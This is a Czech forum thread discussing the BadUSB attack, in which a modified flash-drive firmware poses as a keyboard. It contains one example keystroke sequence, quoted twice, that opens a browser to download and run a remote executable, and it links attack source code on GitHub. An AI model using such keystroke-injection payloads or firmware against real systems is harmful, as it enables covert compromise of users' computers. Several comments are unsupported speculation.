Proti novému viru ochrana prakticky není

[Pic]

Viz - http://www.novinky.cz/internet-a-pc/bez ... stuje.html

[Reklama]

[petr22]

Nejdriv reknou ze necni ochrana, pak ze existuje update firmware - a to ze virus je jen pro Windows nereknou vubec.

Hlavne je ale nutne podporit prodej hardware - musite mit novy hardware, nebo vam virus sezere babicku, otravi psa a zapali byt. Bububu.

[Pic]

Ona vlastně je jasná i prevence - nestrkat cizí flashku do svého PC, ani svoji do cizího.

[trodas]

Přesně tak. Takže ochrana je a to velmi snadná.
Navíc existuje ochrana Linuxem. Ubuntu je zdarmo, instaluje se snadněji a rychleji než Win, uživatelský komfort instalace programů je tak 10x lepší než ve Win (a snazší - chceš naisntalovat VLC nebo Konqeror? Prostě jen napíšeš VLC v ovládacím panelu na instalaci programů, vyhladá, klikneš, potrvdíš heslem a instaluje se to... samo, poslední verze, atd.) a pro lidi jenž vyslověně nezbytně nepotřebují nějaký Win program a "jedou" jen na netu, je to spása.

Nicméně třeba uživatelský komfort Gimp verzus Photoshop je bohužel nebe a dudy - tady musí někdo programátory přesvědčit, že podstatné je, jak se program ovládá, ne jen co všechno umí...

[faraon]

Ono to tak bývá, že proti novému viru není ochrana

Ovšem zranitelnost přes USB flashky, to tu bylo už před dost lety, jmenovalo se to Stuxnet a byl to virus cílený přímo na íránský jaderný průmysl. Teď jsou "experti" strašně překvapení že stejný princip začal používat i někdo jiný než CIA a Mossad.
Podobně překvapení byli generálové v Pentagonu, když nedávno zjistili že v čipech nakoupených z Číny jsou šmírovací obvody. Do té doby si totiž mysleli že na globální šmírování mají monopol jen oni!

[faraon]

Takže koho by zajímalo jak ten BadUSB vlastně přesně funguje, může si poslechnout přednášku, pochopitelně v angličtině, ale zato s obrázky:



A technicky zdatnější mají k dispozici i zdrojové kódy, aby si mohli hrát na blackhaty: https://github.com/adamcaudill/Psychson

Zdroj: abclinuxu.cz

[Myloš]

Nepochopil jsem, jestli hrozí nebezpečí i v případě, že mám zakázaný jakýkoli autorun.

[Oxxid]

Ano.

[faraon]

Myloš: Koukni do té diskuze na ábíčku. Když se ti flashka po připojení přihlásí jako klávesnice, a pošle do počítače sekvenci "Win+R, iexplore http://nsa.gov/client.exe, Enter, Enter, Enter", tak prostě žádný autorun nepotřebuje, a stejně tak neexistuje způsob jak by tomu mohl zabránit nějaký antivirus. Stejným způsobem může ten upravený firmware spustit nějaký kód přímo z flashky, klidně i z nějaké skryté partišny, kterou Windoze ani nevidí, protože ten crippleware umí zobrazit jen první oddíl. Shodně by to fugovalo i na Linuxu, jen by samozřejmě musela být ta sekvence "kláves" jiná.

[trodas]

Z čehož plyne poučení, že cizí flešky si strkat do PC je ruleta asi jako chtít to naostro s prostitutkou... Rozhodně to není rozumné. Takže vypalování dat na DVD-RW má zelenou :)

[Uziv00]

Myloš: Koukni do té diskuze na ábíčku. Když se ti flashka po připojení přihlásí jako klávesnice, a pošle do počítače sekvenci "Win+R, iexplore http://nsa.gov/client.exe, Enter, Enter, Enter", tak prostě žádný autorun nepotřebuje, a stejně tak neexistuje způsob jak by tomu mohl zabránit nějaký antivirus. Stejným způsobem může ten upravený firmware spustit nějaký kód přímo z flashky, klidně i z nějaké skryté partišny, kterou Windoze ani nevidí, protože ten crippleware umí zobrazit jen první oddíl. Shodně by to fugovalo i na Linuxu, jen by samozřejmě musela být ta sekvence "kláves" jiná.

Tohle zastaví firewall. Tedy za předpokladu, že iexplore nemá přístup k netu (jako v mém případě)
Ale jinak samozřejmě - je to podobné, jako když se přenášely diskety. Popř. můj "virus" pro PMD85, který využíval kazet. Blbý je na tom to, že pokud infekce řadiče USB přežije vypnutí, pak je to v ...

[MiliNess]

Takže vypalování dat na DVD-RW má zelenou :)

Firmware CD/DVD mechanik má taky určitě díru. Jen o ní ještě nevíme.

Já osobně na to koukám z té lepší stránky. Když si s něčím nebudu vědět rady, shodím to na USB virus.